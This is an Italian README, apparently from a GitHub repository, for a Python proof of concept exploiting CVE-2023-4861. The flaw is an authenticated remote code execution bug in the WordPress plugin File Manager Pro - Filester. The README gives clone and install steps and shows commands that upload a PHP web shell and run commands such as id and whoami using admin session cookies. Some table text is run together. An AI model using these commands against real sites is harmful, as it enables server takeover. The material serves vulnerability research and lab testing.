
Prova di concetto per CVE-2023-4861 in Filester
Questo repository contiene una prova di concetto in Python per CVE-2023-4861, un problema di esecuzione remota di codice autenticato nel plugin WordPress File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ su Filesterexploit.py automatizza lo stesso risultato di base descritto nell'avviso pubblico:
/var/www/html/ e permettere il caricamento di file .php.Dettaglio importante dell'implementazione: il mio PoC presuppone che la root web di destinazione sia /var/www/html/. Questo è hardcoded nei dati della richiesta e potrebbe necessitare di aggiustamenti per altre configurazioni di laboratorio.
Clona il repository ed entraci:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Installa le dipendenze:
pip install requests
Mostra aiuto:
python3 exploit.py --help
Esempio base:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Nome shell personalizzato opzionale:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'